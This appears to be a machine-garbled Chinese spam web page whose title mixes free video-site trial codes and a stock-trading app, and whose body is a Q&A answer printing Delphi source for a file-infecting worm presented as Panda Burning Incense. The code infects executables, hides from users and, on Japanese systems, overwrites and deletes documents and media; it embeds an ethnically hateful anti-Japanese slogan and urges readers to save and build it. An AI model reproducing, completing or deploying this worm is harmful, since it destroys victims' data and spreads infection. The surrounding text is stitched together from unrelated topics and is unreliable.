熊猫影视收费体验代码 哪有熊猫烧香的源代码?(证券交易APP)

财经是一个充溢危险的畛域,投资者们需求具有肯定的危险认识微风险治理才能。只有正在危险可控的状况下,能力完成持重的投资报答。假如你正在股圈中遇到“熊猫影视收费体验代码”的相干疑难,那末不必惊恐,本站会通知你若何解决,置信看完本文,对各人又所协助。

多个谜底解析导航:

一、哪有熊猫烧香的源代码?

哪有熊猫烧香的源代码?

优质答复:programjapussy;

uses

windows,sysutils,classes,graphics,shellapi{,registry};

const

headersize=82432;//病毒体的巨细

iconoffset=$12eb8;//pe文件主图标的偏偏移量

//正在我的delphi5sp1下面编译失去的巨细,其它版本的delphi可能没有同

//查找2800000020的十六进制字符串能够找到主图标的偏偏移量

{

headersize=38912;//upx紧缩过病毒体的巨细

iconoffset=$92bc;//upx紧缩过pe文件主图标的偏偏移量

//upx1.24w用法:upx-9--8086japussy.exe

}

iconsize=$2e8;//pe文件主图标的巨细--744字节

icontail=iconoffset+iconsize;//pe文件主图标的尾部

id=$44444444;//传染标志

//渣滓码,以备写入

catchword='ifaraceneedtobekilledout,itmustbeyamato.'+

'ifacountryneedtobedestroyed,itmustbejapan!'+

'***w32.japussy.worm.a***';

{$r*.res}

functionregisterserviceprocess(dwprocessid,dwtype:integer):integer;

stdcall;external'kernel32.dll';//函数申明

var

tmpfile:string;

si:startupinfo;

pi:process_information;

isjap:boolean=false;//日文操作零碎标志

{判别能否为win9x}

functioniswin9x:boolean;

var

ver:tosversioninfo;

begin

result:=false;

ver.dwosversioninfosize:=sizeof(tosversioninfo);

ifnotgetversionex(ver)then

exit;

if(ver.dwplatformid=ver_platform_win32_windows)then//win9x

result:=true;

end;

{正在流之间复制}

procedurecopystream(src:tstream;sstartpos:integer;dst:tstream;

dstartpos:integer;count:integer);

var

scurpos,dcurpos:integer;

begin

scurpos:=src.position;

dcurpos:=dst.position;

src.seek(sstartpos,0);

dst.seek(dstartpos,0);

dst.copyfrom(src,count);

src.seek(scurpos,0);

dst.seek(dcurpos,0);

end;

{将宿主文件从已传染的pe文件中别离进去,以备应用}

procedureextractfile(filename:string);

var

sstream,dstream:tfilestream;

begin

try

sstream:=tfilestream.create(paramstr(0),fmopenreadorfmsharedenynone);

try

dstream:=tfilestream.create(filename,fmcreate);

try

sstream.seek(headersize,0);//跳过甚部的病毒局部

dstream.copyfrom(sstream,sstream.size-headersize);

finally

dstream.free;

end;

finally

sstream.free;

end;

except

end;

end;

{填充startupinfo构造}

procedurefillstartupinfo(varsi:startupinfo;state:word);

begin

si.cb:=sizeof(si);

si.lpreserved:=nil;

si.lpdesktop:=nil;

si.lptitle:=nil;

si.dwflags:=startf_useshowwindow;

si.wshowwindow:=state;

si.cbreserved2:=0;

si.lpreserved2:=nil;

end;

{发带毒邮件}

proceduresendmail;

begin

//哪位仁兄情愿实现之?

end;

{传染pe文件}

procedureinfectonefile(filename:string);

var

hdrstream,srcstream:tfilestream;

icostream,dststream:tmemorystream;

iid:longint;

aicon:ticon;

infected,ispe:boolean;

i:integer;

buf:array[01]ofchar;

begin

try//犯错则文件在被应用,加入

ifcomparetext(filename,'japussy.exe')=0then//是本人则没有传染

exit;

infected:=false;

ispe:=false;

srcstream:=tfilestream.create(filename,fmopenread);

try

fori:=0to$108do//反省pe文件头

begin

srcstream.seek(i,sofrombeginning);

srcstream.read(buf,2);

if(buf[0]=#80)and(buf[1]=#69)then//pe标志

begin

ispe:=true;//是pe文件

break;

end;

end;

srcstream.seek(-4,sofromend);//反省传染标志

srcstream.read(iid,4);

if(iid=id)or(srcstream.size<10240)then//过小的文件没有传染

infected:=true;

finally

srcstream.free;

end;

ifinfectedor(notispe)then//假如传染过了或没有是pe文件则加入

exit;

icostream:=tmemorystream.create;

dststream:=tmemorystream.create;

try

aicon:=ticon.create;

try

//失去被传染文件的主图标(744字节),存入流

aicon.releasehandle;

aicon.handle:=extracticon(hinstance,pchar(filename),0);

aicon.savetostream(icostream);

finally

aicon.free;

end;

srcstream:=tfilestream.create(filename,fmopenread);

//头文件

hdrstream:=tfilestream.create(paramstr(0),fmopenreadorfmsharedenynone);

try

//写入病毒体主图标以前的数据

copystream(hdrstream,0,dststream,0,iconoffset);

//写入今朝顺序的主图标

copystream(icostream,22,dststream,iconoffset,iconsize);

//写入病毒体主图标到病毒体尾部之间的数据

copystream(hdrstream,icontail,dststream,icontail,headersize-icontail);

//写入宿主顺序

copystream(srcstream,0,dststream,headersize,srcstream.size);

//写入已传染的标志

dststream.seek(0,2);

iid:=$44444444;

dststream.write(iid,4);

finally

hdrstream.free;

end;

finally

srcstream.free;

icostream.free;

dststream.savetofile(filename);//交换宿主文件

dststream.free;

end;

except;

end;

end;

{将指标文件写入渣滓码后删除了}

proceduresmashfile(filename:string);

var

filehandle:integer;

i,size,mass,max,len:integer;

begin

try

setfileattributes(pchar(filename),0);//去掉只读属性

filehandle:=fileopen(filename,fmopenwrite);//关上文件

try

size:=getfilesize(filehandle,nil);//文件巨细

i:=0;

randomize;

max:=random(15);//写入渣滓码的随机次数

ifmax<5then

max:=5;

mass:=sizedivmax;//每一个距离块的巨细

len:=length(catchword);

whilei<maxdo

begin

fileseek(filehandle,i*mass,0);//定位

//写入渣滓码,将文件彻底毁坏掉

filewrite(filehandle,catchword,len);

inc(i);

end;

finally

fileclose(filehandle);//封闭文件

end;

deletefile(pchar(filename));//删除了之

except

end;

end;

{取得可写的驱动器列表}

functiongetdrives:string;

var

disktype:word;

d:char;

str:string;

i:integer;

begin

fori:=0to25do//遍历26个字母

begin

d:=chr(i+65);

str:=d+':\';

disktype:=getdrivetype(pchar(str));

//失去内陆磁盘以及网络盘

if(disktype=drive_fixed)or(disktype=drive_remote)then

result:=result+d;

end;

end;

{遍历目次,传染以及捣毁文件}

procedureloopfiles(path,mask:string);

var

i,count:integer;

fn,ext:string;

subdir:tstrings;

searchrec:tsearchrec;

msg:tmsg;

functionisvaliddir(searchrec:tsearchrec):integer;

begin

if(searchrec.attr<>16)and(searchrec.name<>'.')and

(searchrec.name<>'')then

result:=0//没有是目次

elseif(searchrec.attr=16)and(searchrec.name<>'.')and

(searchrec.name<>'')then

result:=1//没有是根目次

elseresult:=2;//是根目次

end;

begin

if(findfirst(path+mask,faanyfile,searchrec)=0)then

begin

repeat

peekmessage(msg,0,0,0,pm_remove);//调整音讯行列步队,防止惹起嫌疑

ifisvaliddir(searchrec)=0then

begin

fn:=path+searchrec.name;

ext:=uppercase(extractfileext(fn));

if(ext='.exe')or(ext='.scr')then

begin

infectonefile(fn);//传染可执行文件

end

elseif(ext='.htm')or(ext='.html')or(ext='.asp')then

begin

//传染html以及asp文件,将base64编码后的病毒写入

//传染阅读此网页的一切用户

//哪位年夜兄弟情愿实现之?

end

elseifext='.wab'then//outlook地点簿文件

begin

//猎取outlook邮件地点

end

elseifext='.adc'then//foxmail地点主动实现文件

begin

//猎取foxmail邮件地点

end

elseifext='ind'then//foxmail地点簿文件

begin

//猎取foxmail邮件地点

end

else

begin

ifisjapthen//是倭文操作零碎

begin

if(ext='.doc')or(ext='.xls')or(ext='.mdb')or

(ext='.mp3')or(ext='.rm')or(ext='.ra')or

(ext='.wma')or(ext='.zip')or(ext='.rar')or

(ext='.mpeg')or(ext='.asf')or(ext='.jpg')or

(ext='.jpeg')or(ext='.gif')or(ext='.swf')or

(ext='.pdf')or(ext='.chm')or(ext='.avi')then

smashfile(fn);//捣毁文件

end;

end;

end;

//传染或删除了一个文件后就寝200毫秒,防止cpu占用率太高惹起嫌疑

sleep(200);

until(findnext(searchrec)<>0);

end;

findclose(searchrec);

subdir:=tstringlist.create;

if(findfirst(path+'*.*',fadirectory,searchrec)=0)then

begin

repeat

ifisvaliddir(searchrec)=1then

subdir.add(searchrec.name);

until(findnext(searchrec)<>0);

end;

findclose(searchrec);

count:=subdir.count-1;

fori:=0tocountdo

loopfiles(path+subdir.strings+'\',mask);

freeandnil(subdir);

end;

{遍历磁盘上一切的文件}

procedureinfectfiles;

var

driverlist:string;

i,len:integer;

begin

ifgetacp=932then//日文操作零碎

isjap:=true;//去死吧!

driverlist:=getdrives;//失去可写的磁盘列表

len:=length(driverlist);

whiletruedo//死轮回

begin

fori:=lendownto1do//遍历每一个磁盘驱动器

loopfiles(driverlist+':\','*.*');//传染之

sendmail;//发带毒邮件

sleep(1000*60*5);//就寝5分钟

end;

end;

{主顺序开端}

begin

ifiswin9xthen//是win9x

registerserviceprocess(getcurrentprocessid,1)//注册为效劳过程

else//winnt

begin

//近程线程映照到explorer过程

//哪位兄台情愿实现之?

end;

//假如是原始病毒体本人

ifcomparetext(extractfilename(paramstr(0)),'japussy.exe')=0then

infectfiles//传染以及发邮件

else//已寄生于宿主顺序上了,开端工作

begin

tmpfile:=paramstr(0);//创立暂时文件

delete(tmpfile,length(tmpfile)-4,4);

tmpfile:=tmpfile+#32+'.exe';//真实的宿主文件,多一个空格

extractfile(tmpfile);//别离之

fillstartupinfo(si,sw_showdefault);

createprocess(pchar(tmpfile),pchar(tmpfile),nil,nil,true,

0,nil,'.',si,pi);//创立新过程运转之

infectfiles;//传染以及发邮件

end;

end.

把我说的空格删去,,而后保留到C盘任何门路下你大略就能患上熊猫烧香变种

人们很难承受与已学常识以及经历相左的信息或观点,由于一集体所学的常识以及观点都是通过重复挑选的。本站对于熊猫影视收费体验代码引见就到这里,心愿能帮你处理当下的懊恼。

发布于 2025-04-02 21:04:40
收藏
分享
海报
1
目录

    推荐阅读